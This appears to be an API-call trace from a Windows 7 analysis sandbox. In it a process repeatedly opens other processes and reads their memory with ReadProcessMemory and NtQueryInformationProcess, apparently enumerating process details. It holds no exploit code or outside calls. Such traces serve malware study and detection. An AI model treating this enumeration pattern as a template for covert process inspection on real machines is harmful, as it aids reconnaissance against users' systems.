[0403.450] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.450] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.480] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x240
[0403.481] GetLastError () returned 0x0
[0403.481] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.481] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.481] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.481] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x462910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.482] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4626e6, lpBuffer=0x12dd100, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.483] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.484] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.484] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.484] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x461ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.485] malloc (_Size=0x6e) returned 0x2c4740
[0403.485] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x46274c, lpBuffer=0x2c4740, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.485] free (_Block=0x2c4740)
[0403.486] CloseHandle (hObject=0x240) returned 1
[0403.487] _ui64tow (_Value=0xa00, _Buffer="2548", _Radix=10) returned="2560"
[0403.492] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2560") returned 4
[0403.493] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.493] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.517] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa00) returned 0x240
[0403.517] GetLastError () returned 0x0
[0403.517] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.517] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.517] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.518] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4e2950, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.518] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4e26fc, lpBuffer=0x12dd100, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.519] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.520] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.520] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.521] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4e1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.521] malloc (_Size=0x7c) returned 0x2c4740
[0403.521] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4e2770, lpBuffer=0x2c4740, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.521] free (_Block=0x2c4740)
[0403.525] CloseHandle (hObject=0x240) returned 1
[0403.526] _ui64tow (_Value=0xa0c, _Buffer="2560", _Radix=10) returned="2572"
[0403.531] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2572") returned 4
[0403.532] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.532] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.554] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa0c) returned 0x240
[0403.554] GetLastError () returned 0x0
[0403.554] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.554] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.554] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.555] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.555] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b26ea, lpBuffer=0x12dd100, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.556] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.557] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.557] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.558] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.558] malloc (_Size=0x7a) returned 0x2c4740
[0403.558] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b275c, lpBuffer=0x2c4740, nSize=0x78, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.558] free (_Block=0x2c4740)
[0403.559] CloseHandle (hObject=0x240) returned 1
[0403.560] _ui64tow (_Value=0xa18, _Buffer="2572", _Radix=10) returned="2584"
[0403.564] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2584") returned 4
[0403.565] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.566] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.588] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa18) returned 0x240
[0403.588] GetLastError () returned 0x0
[0403.588] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.588] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.589] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.589] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x462920, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.589] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4626e6, lpBuffer=0x12dd100, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.590] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.591] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.591] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.591] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x461ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.592] malloc (_Size=0x72) returned 0x2c4740
[0403.592] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x462750, lpBuffer=0x2c4740, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.592] free (_Block=0x2c4740)
[0403.593] CloseHandle (hObject=0x240) returned 1
[0403.594] _ui64tow (_Value=0xa24, _Buffer="2584", _Radix=10) returned="2596"
[0403.598] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2596") returned 4
[0403.599] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.599] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.625] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa24) returned 0x240
[0403.625] GetLastError () returned 0x0
[0403.625] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.626] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.626] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.626] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c28e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.626] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c26e4, lpBuffer=0x12dd100, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.627] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.629] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.629] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.629] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.629] malloc (_Size=0x60) returned 0x2c0790
[0403.629] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c273c, lpBuffer=0x2c0790, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0403.629] free (_Block=0x2c0790)
[0403.630] CloseHandle (hObject=0x240) returned 1
[0403.631] _ui64tow (_Value=0xa2c, _Buffer="2596", _Radix=10) returned="2604"
[0403.638] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2604") returned 4
[0403.640] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.640] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.706] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa2c) returned 0x240
[0403.706] GetLastError () returned 0x0
[0403.706] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.706] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.706] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.707] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x202950, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.707] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2026f0, lpBuffer=0x12dd100, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.708] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.709] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.709] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.709] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x201ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.710] malloc (_Size=0x82) returned 0x2c4740
[0403.710] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x20276a, lpBuffer=0x2c4740, nSize=0x80, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.710] free (_Block=0x2c4740)
[0403.711] CloseHandle (hObject=0x240) returned 1
[0403.712] _ui64tow (_Value=0xbb4, _Buffer="2604", _Radix=10) returned="2996"
[0403.716] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2996") returned 4
[0403.718] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.718] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.759] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x240
[0403.759] GetLastError () returned 0x0
[0403.759] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.759] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.760] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.760] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xd2910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.760] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xd26f2, lpBuffer=0x12dd100, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.762] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.763] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.763] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.763] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xd1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.763] malloc (_Size=0x6c) returned 0x2c4740
[0403.764] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xd2756, lpBuffer=0x2c4740, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.764] free (_Block=0x2c4740)
[0403.765] CloseHandle (hObject=0x240) returned 1
[0403.766] _ui64tow (_Value=0xbbc, _Buffer="2996", _Radix=10) returned="3004"
[0403.770] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3004") returned 4
[0403.772] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243a4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.772] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.795] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbbc) returned 0x240
[0403.795] GetLastError () returned 0x0
[0403.795] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.796] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.796] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.796] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x572900, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.796] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5726ee, lpBuffer=0x12dd100, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.797] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.798] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.798] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.798] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x571ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.799] malloc (_Size=0x68) returned 0x2c08e0
[0403.799] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x57274e, lpBuffer=0x2c08e0, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c08e0*, lpNumberOfBytesRead=0x0) returned 1
[0403.799] free (_Block=0x2c08e0)
[0403.800] CloseHandle (hObject=0x240) returned 1
[0403.801] _ui64tow (_Value=0xbc4, _Buffer="3004", _Radix=10) returned="3012"
[0403.806] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3012") returned 4
[0403.808] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
